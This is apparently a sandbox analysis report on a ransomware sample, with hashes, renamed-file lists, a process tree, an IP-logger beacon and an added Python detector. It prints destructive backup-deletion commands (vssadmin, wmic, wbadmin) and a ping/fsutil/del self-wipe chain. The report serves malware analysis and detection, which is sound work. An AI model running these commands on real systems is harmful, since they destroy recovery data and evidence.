Overview

Static analysis: score 10/10

Behavioral runs, one line per task (score out of 10, sample, platform):

Score  Sample                 Platform
10     55c30024ae...15.exe    windows7-x64
10     55c30024ae...15.exe    windows7-x64
10     55c30024ae...15.exe    windows10-2004-x64
10     55c30024ae...15.exe    windows10-ltsc_2021-x64
10     55c30024ae...15.exe    windows11-21h2-x64
10     56f7b48f38...59.exe    windows10-2004-x64
10     56f7b48f38...59.exe    windows7-x64
10     56f7b48f38...59.exe    windows10-2004-x64
10     56f7b48f38...59.exe    windows10-ltsc_2021-x64
10     56f7b48f38...59.exe    windows11-21h2-x64
10     5a96b92938...a4.exe    windows11-21h2-x64
10     5a96b92938...a4.exe    windows7-x64
10     5a96b92938...a4.exe    windows10-2004-x64
10     5a96b92938...a4.exe    windows10-ltsc_2021-x64
10     5a96b92938...a4.exe    windows11-21h2-x64
10     606b88fce1...c4.exe    windows10-2004-x64
 3     606b88fce1...c4.exe    windows7-x64
 1     606b88fce1...c4.exe    windows10-2004-x64
 3     606b88fce1...c4.exe    windows10-ltsc_2021-x64
 3     606b88fce1...c4.exe    windows11-21h2-x64
 3     6bda9faf71...4b.exe    windows11-21h2-x64
10     6bda9faf71...4b.exe    windows7-x64
10     6bda9faf71...4b.exe    windows10-2004-x64
10     6bda9faf71...4b.exe    windows10-ltsc_2021-x64
10     6bda9faf71...4b.exe    windows11-21h2-x64
10     71b46e95fb...a8.exe    windows11-21h2-x64
10     71b46e95fb...a8.exe    windows7-x64
10     71b46e95fb...a8.exe    windows10-2004-x64
10     71b46e95fb...a8.exe    windows10-ltsc_2021-x64
10     71b46e95fb...a8.exe    windows11-21h2-x64

Five of the six samples score 10 on every platform. The 606b88fce1...c4.exe sample scores 1 to 3 on four of its five runs and 6bda9faf71...4b.exe scores 3 on one run; a low score on a ransomware sample that scores 10 elsewhere usually means the run did not get as far as encryption on that image, so those runs should not be read as the sample being benign there.
Resubmissions (each scored 10/10)

Analysis ID         Submitted
250325-qfl42aznw9   25/03/2025, 13:12 UTC
250325-qdtq4aznv6   25/03/2025, 13:09 UTC
250325-qbtcjszns3   25/03/2025, 13:05 UTC
250325-p9k86awxat   25/03/2025, 13:01 UTC
250325-p58tnawwe1   25/03/2025, 12:55 UTC
250325-p3txqazmt6   25/03/2025, 12:51 UTC
250205-ndjvsavrdm   05/02/2025, 11:16 UTC
240716-kt64gavakp   16/07/2024, 08:54 UTC

Analysis
max time kernel: 99s
max time network: 104s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 25/03/2025, 13:01 UTC
Static task: static1

Behavioral tasks (task, sample, resource):

behavioral1   55c30024aed833336eb4720a1a4a40c78496efb27b3c4d5c3f1d1b5935c12715.exe  win7-20240903-en
behavioral2   55c30024aed833336eb4720a1a4a40c78496efb27b3c4d5c3f1d1b5935c12715.exe  win7-20241010-en
behavioral3   55c30024aed833336eb4720a1a4a40c78496efb27b3c4d5c3f1d1b5935c12715.exe  win10v2004-20250314-en
behavioral4   55c30024aed833336eb4720a1a4a40c78496efb27b3c4d5c3f1d1b5935c12715.exe  win10ltsc2021-20250314-en
behavioral5   55c30024aed833336eb4720a1a4a40c78496efb27b3c4d5c3f1d1b5935c12715.exe  win11-20250313-en
behavioral6   56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe  win10v2004-20250314-en
behavioral7   56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe  win7-20240903-en
behavioral8   56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe  win10v2004-20250314-en
behavioral9   56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe  win10ltsc2021-20250314-en
behavioral10  56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe  win11-20250314-en
behavioral11  5a96b929383817aa298eec8cca019bcd984fcd71dd8ee353541392c1082756a4.exe  win11-20250314-en
behavioral12  5a96b929383817aa298eec8cca019bcd984fcd71dd8ee353541392c1082756a4.exe  win7-20241010-en
behavioral13  5a96b929383817aa298eec8cca019bcd984fcd71dd8ee353541392c1082756a4.exe  win10v2004-20250314-en
behavioral14  5a96b929383817aa298eec8cca019bcd984fcd71dd8ee353541392c1082756a4.exe  win10ltsc2021-20250314-en
behavioral15  5a96b929383817aa298eec8cca019bcd984fcd71dd8ee353541392c1082756a4.exe  win11-20250313-en
behavioral16  606b88fce1441e6d83e1fb2ba1b511e4a9e68f7fc01c55b7c53e08fd28f9a0c4.exe  win10v2004-20250314-en
behavioral17  606b88fce1441e6d83e1fb2ba1b511e4a9e68f7fc01c55b7c53e08fd28f9a0c4.exe  win7-20240903-en
behavioral18  606b88fce1441e6d83e1fb2ba1b511e4a9e68f7fc01c55b7c53e08fd28f9a0c4.exe  win10v2004-20250314-en
behavioral19  606b88fce1441e6d83e1fb2ba1b511e4a9e68f7fc01c55b7c53e08fd28f9a0c4.exe  win10ltsc2021-20250314-en
behavioral20  606b88fce1441e6d83e1fb2ba1b511e4a9e68f7fc01c55b7c53e08fd28f9a0c4.exe  win11-20250314-en
behavioral21  6bda9faf719bb7a55e822667d909086193d323d8fa06b1a3d62437fcf6a9e24b.exe  win11-20250313-en
behavioral22  6bda9faf719bb7a55e822667d909086193d323d8fa06b1a3d62437fcf6a9e24b.exe  win7-20240903-en
behavioral23  6bda9faf719bb7a55e822667d909086193d323d8fa06b1a3d62437fcf6a9e24b.exe  win10v2004-20250314-en
behavioral24  6bda9faf719bb7a55e822667d909086193d323d8fa06b1a3d62437fcf6a9e24b.exe  win10ltsc2021-20250314-en
behavioral25  6bda9faf719bb7a55e822667d909086193d323d8fa06b1a3d62437fcf6a9e24b.exe  win11-20250313-en
behavioral26  71b46e95fba31267475537a338f49ce1cd0bc56c0f15346b05b673051cbe90a8.exe  win11-20250313-en
behavioral27  71b46e95fba31267475537a338f49ce1cd0bc56c0f15346b05b673051cbe90a8.exe  win7-20241010-en
behavioral28  71b46e95fba31267475537a338f49ce1cd0bc56c0f15346b05b673051cbe90a8.exe  win10v2004-20250314-en
behavioral29  71b46e95fba31267475537a338f49ce1cd0bc56c0f15346b05b673051cbe90a8.exe  win10ltsc2021-20250314-en
behavioral30  71b46e95fba31267475537a338f49ce1cd0bc56c0f15346b05b673051cbe90a8.exe  win11-20250313-en

The sections below describe behavioral7 (56f7b48f...0659.exe on win7-20240903-en).
General

Target: 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
Size: 42KB
MD5: abb04a0418be9cc4618f393d7fc9d76b
SHA1: dbe3b07ab1383e4d693bb6cab17ad8a7c1c5cd7b
SHA256: 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659
SHA512: f7bce71f01ffae675a8b8a23a8f2e4d162ccefc349beadb84ffcca890dc68ed636acf4f7d694145c779125078f6634f30aed5f5651ee6c12dc4768f7c0a0f47b
SSDEEP: 768:QO1oR/8VS1RzK4wbs+D/SIJX+ZZ1SQQwZuIOPzDsHw67ZY23IWSjNV:QgS1FKnDtkuImsHw6V73ejNV
Malware Config

Extracted from: C:\Users\Admin\AppData\Local\Temp\+README-WARNING+.txt
Contact e-mail: ardellchadwick275@msgsafe.io
Signatures

Deletes shadow copies (3 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

Renames multiple (8309) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.

Deletes backup catalog (1 IoC)
  pid 2832  wbadmin.exe

Deletes itself (1 IoC)
  pid 2044  cmd.exe

Reads user/profile data of web browsers (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 4  iplogger.com
  flow 5  iplogger.com

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Set value (str)  \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\318E.tmp.bmp"  by 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
Drops file in Program Files directory (64 IoCs)
  All 64 entries are by 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe. "File opened for modification" is the in-place encryption of an existing file; "File created" is the ransom note +README-WARNING+.txt being written into the directory. The first entry shows the renamed form: the original name, then .[74B92775] (victim ID), then .[ardellchadwick275@msgsafe.io] (contact address), then .mkp.

  File opened for modification  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf.[74B92775].[ardellchadwick275@msgsafe.io].mkp
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP
  File created                  C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\+README-WARNING+.txt
  File created                  C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\+README-WARNING+.txt
  File opened for modification  C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AFTRNOON\PREVIEW.GIF
  File opened for modification  C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\JOURNAL\JOURNAL.ELM
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152698.WMF
  File opened for modification  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png
  File opened for modification  C:\Program Files\Mozilla Firefox\browser\features\webcompat-reporter@mozilla.org.xpi
  File opened for modification  C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo
  File opened for modification  C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUECALM\BLUECALM.INF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG
  File opened for modification  C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00636_.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01954_.WMF
  File opened for modification  C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\calendar.css
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199465.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FINCL_02.MID
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00395_.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF
  File created                  C:\Program Files\Microsoft Games\Purble Place\ja-JP\+README-WARNING+.txt
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00248_.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp
  File opened for modification  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199279.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Country.css
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville
  File opened for modification  C:\Program Files\Mozilla Firefox\xul.dll.sig
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00921_.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg
  File opened for modification  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\js\highDpiImageSwap.js
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\America\Yakutat
  File created                  C:\Program Files\Microsoft Games\Solitaire\ja-JP\+README-WARNING+.txt
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_hov.png
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png
  File opened for modification  C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SATIN\THMBNAIL.PNG
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Templates\1033\EssentialResume.dotx
  File opened for modification  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png
  File opened for modification  C:\Program Files\DVD Maker\Shared\DissolveAnother.png
  File opened for modification  C:\Program Files\Mozilla Firefox\locale.ini
  File opened for modification  C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Waitcursor.gif
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\main.html
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01421_.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Classic.dotx
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt
  File opened for modification  C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac
  File opened for modification  C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe Root Certificate.cer
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107042.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER.XML
  File opened for modification  C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_s.png
  File opened for modification  C:\Program Files\7-Zip\Lang\ro.txt
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho
System Location Discovery: System Language Discovery (1 TTP, 5 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  by cmd.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  by PING.EXE
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  by fsutil.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  by 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe (twice)
  Reading this key is routine process start-up behaviour (the stock cmd.exe, PING.EXE and fsutil.exe are flagged too), so on its own it carries little weight.

System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 2 IoCs)
  Adversaries may check for Internet connectivity on compromised systems.
  pid 2044  cmd.exe
  pid 2388  PING.EXE
  In this run the ping is not a connectivity check: "ping 1.1.1.1 -n 5" is the delay that lets the parent exit before fsutil and del wipe its binary (see the command line under Processes).

Interacts with shadow copies (3 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid 2984  vssadmin.exe

Runs ping.exe (1 TTP, 1 IoC)
  pid 2388  PING.EXE

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 2132  56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe

Suspicious use of AdjustPrivilegeToken (46 IoCs)
  pid 2768  vssvc.exe     SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  pid 2748  wbengine.exe  SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
  pid 2644  WMIC.exe      SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (this set of 20 is recorded twice)
  The vssvc.exe and wbengine.exe entries are the Windows shadow-copy and backup services servicing the delete requests, and wmic.exe enabling every privilege in its token is how that tool starts; the attacker-controlled action is the "wmic shadowcopy delete" command line, not the privilege changes themselves.

Suspicious use of WriteProcessMemory (25 IoCs)
  PID 2132 (56f7b48f...0659.exe) wrote to memory of 2128 (cmd.exe, target 31), 4 times
  PID 2128 (cmd.exe) wrote to memory of 2984 (vssadmin.exe, target 33), 3 times
  PID 2128 (cmd.exe) wrote to memory of 2832 (wbadmin.exe, target 36), 3 times
  PID 2128 (cmd.exe) wrote to memory of 2644 (WMIC.exe, target 40), 3 times
  PID 2132 (56f7b48f...0659.exe) wrote to memory of 2044 (cmd.exe, target 46), 4 times
  PID 2044 (cmd.exe) wrote to memory of 2388 (PING.EXE, target 48), 4 times
  PID 2044 (cmd.exe) wrote to memory of 1772 (fsutil.exe, target 49), 4 times
  Every target is a child the writing process has just spawned, so this table mirrors the process tree below rather than injection into an unrelated process.

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

Indentation shows parent/child; the 32-bit sample's calls to C:\Windows\system32\cmd.exe are served from C:\Windows\SysWOW64 by WoW64 file-system redirection, which is why the image path and the command line differ for PID 2044.

C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe  (PID 2132)
    command line: "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe  (PID 2292)
        command line: "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe" n2132
        (the sample relaunches itself with "n" followed by the parent's PID)
        - System Location Discovery: System Language Discovery

    C:\Windows\system32\cmd.exe  (PID 2128)
        command line: "C:\Windows\system32\cmd.exe"
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\vssadmin.exe  (PID 2984)
            command line: vssadmin delete shadows /all /quiet
            - Interacts with shadow copies

        C:\Windows\system32\wbadmin.exe  (PID 2832)
            command line: wbadmin delete catalog -quiet
            - Deletes backup catalog

        C:\Windows\System32\Wbem\WMIC.exe  (PID 2644)
            command line: wmic shadowcopy delete
            - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe  (PID 2044)
        command line: C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe" & del /q /f "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"
        (wait about five seconds, zero the first 128 KiB of the sample on disk, then delete it; the zero-fill means the bytes are gone even if the file is later undeleted)
        - Deletes itself
        - System Location Discovery: System Language Discovery
        - System Network Configuration Discovery: Internet Connection Discovery
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\PING.EXE  (PID 2388)
            command line: ping 1.1.1.1 -n 5
            - System Location Discovery: System Language Discovery
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe

        C:\Windows\SysWOW64\fsutil.exe  (PID 1772)
            command line: fsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"
            - System Location Discovery: System Language Discovery

C:\Windows\system32\vssvc.exe  (PID 2768)
    command line: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbengine.exe  (PID 2748)
    command line: "C:\Windows\system32\wbengine.exe"
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\vdsldr.exe  (PID 3036)
    command line: C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe  (PID 2756)
    command line: C:\Windows\System32\vds.exe

C:\Windows\system32\Dwm.exe  (PID 1088)
    command line: "C:\Windows\system32\Dwm.exe"

The five top-level system processes (vssvc.exe, wbengine.exe, vdsldr.exe, vds.exe, Dwm.exe) are Windows services started on demand by the shadow-copy and backup deletions and by the wallpaper change; they are not dropped or injected by the sample.
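The process tree above contains the two command-line patterns a detection engineer would want to alert on from this run: the backup-destruction trio (vssadmin delete shadows, wmic shadowcopy delete, wbadmin delete catalog) and the "cmd /c ping ... & fsutil file setZeroData ... & del ..." self-wipe. The following is an added example written for this page, not code from the sandbox or from the sample's authors. It re-types the tree as process-creation events (a constructed input; the root's parent PID is set to 0 because the report does not show it) and runs two checks over them: one for the backup-tampering commands, one that recognises the delay/zero-fill/delete chain and reports whether the wiped path is the image of the process that spawned the chain, which is the property that makes it self-deletion rather than ordinary file cleanup.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record in the shape Sysmon event 1 or an EDR would give you."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed input: the process tree from the report above, re-typed as events.
# PIDs, image paths and command lines are the ones shown there; ppid 0 marks the root
# (its real parent is not in the report).
SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe")
EVENTS = [
    ProcEvent(2132, 0, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(2292, 2132, SAMPLE, f'"{SAMPLE}" n2132'),
    ProcEvent(2128, 2132, r"C:\Windows\system32\cmd.exe", r'"C:\Windows\system32\cmd.exe"'),
    ProcEvent(2984, 2128, r"C:\Windows\system32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ProcEvent(2832, 2128, r"C:\Windows\system32\wbadmin.exe", "wbadmin delete catalog -quiet"),
    ProcEvent(2644, 2128, r"C:\Windows\System32\Wbem\WMIC.exe", "wmic shadowcopy delete"),
    ProcEvent(2044, 2132, r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 5 & fsutil file setZeroData "
              f'offset=0 length=131072 "{SAMPLE}" & del /q /f "{SAMPLE}"'),
    ProcEvent(2388, 2044, r"C:\Windows\SysWOW64\PING.EXE", "ping 1.1.1.1 -n 5"),
    ProcEvent(1772, 2044, r"C:\Windows\SysWOW64\fsutil.exe",
              f'fsutil file setZeroData offset=0 length=131072 "{SAMPLE}"'),
]

# Backup/recovery tampering: the three commands the sample ran through cmd.exe.
BACKUP_TAMPER = [
    (re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I), "vssadmin delete shadows"),
    (re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I), "wmic shadowcopy delete"),
    (re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\b.*\bcatalog\b", re.I), "wbadmin delete catalog"),
]

# Self-deletion chain: a delay (ping -n N), a zero-fill of a file and a del of the
# same file, all inside one "cmd /c" command line. The quoted path after each verb
# is captured so the two can be compared.
CMD_C = re.compile(r"\bcmd(?:\.exe)?\b.*\s/c\s", re.I)
PING_DELAY = re.compile(r"\bping\b[^&]*\s-n\s+\d+", re.I)
ZERO_FILL = re.compile(r'\bfsutil\b\s+file\s+setZeroData\b[^&]*?"([^"]+)"', re.I)
DELETE = re.compile(r'\bdel\b[^&]*?"([^"]+)"', re.I)


def backup_tamper(cmdline: str) -> List[str]:
    """Labels of every backup-destroying command found in one command line."""
    return [label for rx, label in BACKUP_TAMPER if rx.search(cmdline)]


def self_delete_target(cmdline: str) -> Optional[str]:
    """Path that a 'cmd /c ping ... & fsutil setZeroData ... & del ...' chain wipes, else None."""
    if not CMD_C.search(cmdline):
        return None
    zero, dele = ZERO_FILL.search(cmdline), DELETE.search(cmdline)
    if not (PING_DELAY.search(cmdline) and zero and dele):
        return None
    # Only a chain that zero-fills and deletes the *same* file counts.
    return zero.group(1) if zero.group(1).lower() == dele.group(1).lower() else None


def detect(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """(pid, finding, detail) per matching event. For self_delete the detail says whether
    the wiped file is the image of the process that spawned the chain (parent_image) or not."""
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[int, str, str]] = []
    for e in events:
        for label in backup_tamper(e.cmdline):
            findings.append((e.pid, "backup_tamper", label))
        target = self_delete_target(e.cmdline)
        if target:
            parent = by_pid.get(e.ppid)
            own = parent is not None and parent.image.lower() == target.lower()
            findings.append((e.pid, "self_delete", "parent_image" if own else "other_file"))
    return findings


if __name__ == "__main__":
    for pid, kind, detail in detect(EVENTS):
        print(pid, kind, detail)
```

Run against the constructed events this yields three backup_tamper findings (PIDs 2984, 2832, 2644) and one self_delete finding on PID 2044 tagged parent_image, because the path fsutil zero-fills is exactly the image of PID 2132 that spawned the cmd.exe. The parent-image comparison is the part worth keeping in a production rule: a "ping then del" of some temp file is common in installers, a "ping then zero-fill then del" of the caller's own executable is not.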
Network

DNS (8.8.8.8:53)
  Request:  iplogger.com  IN A
  Response: iplogger.com  IN A  104.21.76.57
            iplogger.com  IN A  172.67.188.178

GET https://iplogger.com/1QhhX4  (remote 104.21.76.57:443, by 56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe)

Request:
GET /1QhhX4 HTTP/1.1
Referer: 74B92775;2.22
Host: iplogger.com
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: 443237163563470739=1; expires=Wed, 25 Mar 2026 13:04:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
Set-Cookie: clhf03028ja=212.102.63.147; expires=Wed, 25 Mar 2026 13:04:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
memory: 0.41068267822265625
expires: Tue, 25 Mar 2025 13:04:15 +0000
Cache-Control: no-store, no-cache, must-revalidate
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvMZ8sf8%2Fg%2FggSbvhnGSLS3p6CMh0vksF%2FA0BhByDmKj3txb%2Fb4WNIkFSNr82yq13vDkQBD9ok94gv7newK4GrXH3fxwgW6096s9xpL6osOpgIkNDfX8VWGkGVUR8wM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925e9cf11db2bec9-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=46417&min_rtt=21362&rtt_var=54240&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3133&recv_bytes=411&delivery_rate=152334&cwnd=253&unsent_bytes=0&cid=167ad39131ee6508&ts=356&x=0"

This is the only contact with attacker-chosen infrastructure in the run. The request is a fetch of an IP-logger tracking image: the Referer value is not a URL but the victim ID 74B92775 (the same string the sample appends to every encrypted file name) followed by 2.22, and the service records the requester's public address, which it also echoes back in the clhf03028ja cookie. No payload is downloaded and no command is received; the traffic tells the operator that a host with this ID ran the sample and from which IP.
